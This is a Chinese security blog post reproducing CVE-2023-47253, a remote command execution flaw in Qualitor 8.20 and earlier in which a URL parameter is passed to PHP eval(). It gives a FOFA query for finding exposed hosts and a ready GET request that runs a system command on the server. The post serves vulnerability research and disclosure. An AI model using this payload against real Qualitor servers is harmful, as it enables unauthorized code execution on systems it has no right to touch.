Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)

admin 2024年10月28日23:56:26评论42 views字数 1086阅读3分37秒阅读模式
 

01
漏洞介绍
Qualitor系统接口processVariavel.php命令执行漏洞

(CVE-2023-47253)

Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)

【产品介绍】

Qualitor 是一款具有特定功能的软件应用程序,以下是对它的介绍:致力于提供更好的服务体验:从 “SOFTWARE PARA ATENDER MELHOR”(软件以提供更好的服务)可以看出,Qualitor 的目标是为用户带来高质量的服务体验,可能在功能设计和用户交互方面进行了优化,以满足用户的各种需求。注重用户沟通:“Fale conosco”(与我们交谈)表明该应用程序重视与用户的沟通交流,可能提供了便捷的反馈渠道或客户支持服务,以便及时解决用户在使用过程中遇到的问题。
【漏洞介绍】
    Qualitor 8.20 及之前版本存在此漏洞,远程攻击者可以利用该漏洞通过 PHP 代码执行任意代码,具有较大的危害性。命令注入漏洞是一种常见的安全漏洞类型,攻击者可以通过在应用程序的输入字段中注入恶意命令,让应用程序执行这些命令,从而获取敏感信息、控制服务器或执行其他恶意操作。
CVE编号:CVE-2023-47253
CNNVD编号:CNNVD-202404-938
网络安全
共筑防线
Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)

Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)

02
漏洞复现
分析、复现
Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)

【FOFA】

app="Qualitor-Web"

【影响版本】

Qualitor 8.20及之前版本

Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)

【漏洞分析】

在 Qualitor 的/html/ad/adpesquisasql/request/processVariavel.php文件中,存在对用户输入的gridValoresPopHidden参数未进行严格过滤和验证的问题。该参数被直接传递给eval()函数进行执行,而eval()函数会将输入的字符串作为 PHP 代码进行解析和执行。这使得攻击者可以构造恶意的gridValoresPopHidden参数,注入恶意的 PHP 代码,从而在服务器上执行任意命令。
【漏洞利用过程】
发送get请求:
GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("ipconfig"); HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Connection: Keep-Alive
Accept: */*


Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)

03

原文始发于微信公众号(东方隐侠安全团队):漏洞复现|Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月28日23:56:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Qualitor系统接口processVariavel.php命令执行漏洞(CVE-2023-47253)https://cn-sec.com/archives/3315611.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息